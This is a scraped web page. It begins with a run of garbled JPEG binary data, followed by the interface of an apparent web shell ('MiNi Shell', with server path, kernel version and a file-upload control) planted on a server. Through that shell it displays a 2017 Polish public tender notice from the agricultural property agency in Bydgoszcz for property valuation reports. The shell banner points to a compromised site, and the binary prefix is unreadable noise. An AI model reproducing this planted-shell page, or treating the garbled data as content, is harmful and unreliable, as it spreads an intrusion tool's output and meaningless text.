JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170215/26060-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.anr.gov.pl' target='_blank'>http://www.anr.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 26060 - 2017
              z dnia 2017-02-15 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bydgoszcz: Sporządzenie operatów szacunkowych na wycenę nieruchomości zabudowanych 
i niezabudowanych, będących w Zasobie ANR OT Bydgoszcz, położonych na terenie województwa kujawsko-pomorskiego, z uwzględnieniem podziału na części  11 zadań
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Agencja Nieruchomości Rolnych Oddział Terenowy w Bydgoszczy, krajowy numer identyfikacyjny
              1034470800632, ul.
              ul. Hetmańska 
              38,
              85039  
              Bydgoszcz, woj.
              kujawsko-pomorskie, państwo
              Polska, tel.
              52 525 08 01, e-mail
              bydgoszcz@anr.gov.pl, faks
              52 525 08 30.
              <br />
              Adres strony internetowej (URL): www.anr.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja rządowa terenowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.anr.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej<br />
                Adres:
                <br />Agencja Nieruchomości Rolnych Oddział Terenowy w Bydgoszczy ul. Hetmańska 38; 85-039 Bydgoszcz</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Sporządzenie operatów szacunkowych na wycenę nieruchomości zabudowanych 
i niezabudowanych, będących w Zasobie ANR OT Bydgoszcz, położonych na terenie województwa kujawsko-pomorskiego, z uwzględnieniem podziału na części  11 zadań
<br /><b>Numer referencyjny: </b>BY.SOP.250.3.2017.MB<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  
                    maksymalnej liczby części 3<br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiot zamówienia obejmuje sporządzenie operatów szacunkowych na wycenę nieruchomości zabudowanych i niezabudowanych, będących w Zasobie ANR OT Bydgoszcz, położonych na terenie województwa kujawsko-pomorskiego, z uwzględnieniem podziału na części  11 zadań. 
2.	Zamawiający dopuszcza składanie ofert częściowych. 
3.	Każde zadanie stanowi osobną część, której wykonanie będzie stanowić ofertę częściową. 
4.	Każdy Wykonawca może złożyć ofertę na wycenę obejmującą od 1 do 3 zadań. Złożenie oferty na więcej niż 3 zadana - części zamówienia skutkować będzie jej odrzuceniem (art. 89 ust. 1 p. 2 ustawy  Prawo zamówień publicznych). 
5.	Zamawiający zastrzega, że przy podpisywaniu umów nie będzie przekazywał rzeczoznawcom wypisów, map ewidencyjnych oraz zaświadczenia z planu lub studium.  
6.	Wykonawca zobowiązany jest załączyć do każdego operatu aktualne wypisy 
z rejestru gruntów, kopie map ewidencyjnych oraz protokoły z badania aktualnego przeznaczenia nieruchomości w planie lub studium. 
7.	Zamawiający żąda wskazania przez Wykonawcę części zamówienia, których wykonanie zamierza powierzyć podwykonawcom i podania przez Wykonawcę firm podwykonawców
<br /><br /><b>II.5) Główny kod CPV: </b>71319000-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 30<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych wymagań w tym zakresie. <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych wymagań w tym zakresie. <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
a)	dysponują do realizacji zamówienia osobami, posiadającymi świadectwo nadania uprawnień zawodowych w zakresie szacowania nieruchomości

b)	w okresie ostatnich trzech lat wykonali co najmniej 5 wycen nieruchomości zabudowanych i niezabudowanych
Ocena spełniania tego warunku dokonana zostanie na podstawie załączonego do oferty oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 25a ust.1 ustawy Prawo zamówień publicznych, wg formuły spełnia/ nie spełnia oraz na podstawie:
a)	wykazu usług wykonanych, w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz 
z podaniem ich  wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi te były wykonane z załączeniem dowodów określających czy usługi zostały lub są wykonywane należycie, przy czym dowodami o których mowa są referencje bądź inne dokumenty, wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, 
a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest 
w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty, potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
b)	wykazu osób skierowanych przez wykonawcę do realizacji zamówienia, wraz 
z informacjami nt. ich kwalifikacji zawodowych, uprawnień, doświadczenia 
i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a)	wykazu usług wykonanych, w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz 
z podaniem ich  wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi te były wykonane z załączeniem dowodów określających czy usługi zostały lub są wykonywane należycie, przy czym dowodami o których mowa są referencje bądź inne dokumenty, wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, 
a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest 
w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty, potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
b)	wykazu osób skierowanych przez wykonawcę do realizacji zamówienia, wraz 
z informacjami nt. ich kwalifikacji zawodowych, uprawnień, doświadczenia 
i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Ustala się wadium w wysokości:
Zadanie nr 1-250 zł;
Zadanie nr 2-25 zł;
Zadanie nr 3-50 zł;
Zadanie nr 4-100 zł;
Zadanie nr 5-70 zł;
Zadanie nr 6-25 zł;
Zadanie nr 7-45 zł;
Zadanie nr 8-125 zł;
Zadanie nr 9-50 zł;
Zadanie nr 10-25 zł;
Zadanie nr 11-75 zł;

Wykonawca wnosi wadium:
	w pieniądzu, sposób przekazania: 
na konto Zamawiającego  BGK Toruń nr 94 1130 1075 0002 6130 9720 0002
z dopiskiem: wadium na zadanie nr  w postępowaniu nr BY.SOP.250.3.2017.MB (zaleca się, aby wadium na każde zadanie wniesione było osobnym przelewem)
W przypadku, gdy wadium zostanie wpłacone w całości (jednym przelewem) na kilka zadań 
i suma wpłaconego w ten sposób wadium nie będzie zgodna z sumą wadium  wymaganego na te zadania przez Zamawiającego, Zamawiający nie będzie samodzielnie analizował, na które zadanie wadium zostało wpłacone a na które nie, tylko w myśl art. 89 ust. 1 pkt. 7b ustawy Prawo zamówień publicznych odrzuci złożoną ofertę. 
Za termin wniesienia wadium w formie przelewu pieniężnego, przyjmuje się termin uznania na rachunku Zamawiającego. 
	lub w jednej z poniżej podanych form:
1)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
2)	w gwarancjach bankowych,
3)	w gwarancjach ubezpieczeniowych,
4)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 2016 r. poz. 359 )

Sposób przekazania: 
do siedziby Zamawiającego pokój 114  kancelaria - przed upływem terminu składania ofert.  Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.

Gwarancje bankowe i poręczenia powinny być załączone do oferty w odrębnej kopercie 
i opisane, umożliwiając odesłanie ich, zgodnie z art. 46 ustawy Prawo zamówień publicznych. Zamawiający zaleca aby kopia tych dokumentów była wpięta w ofercie.

Oferta Wykonawcy, który nie wniesie wadium lub nie zabezpieczy oferty akceptowaną formą wadium zostanie odrzucona w myśl. art. 89 ust. 1 pkt 7b ustawy Prawo zamówień publicznych.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie rzeczoznawcy</td><td>20</td></tr><tr><td>aktualizacja operatu w ramach zaoferowanej ceny</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
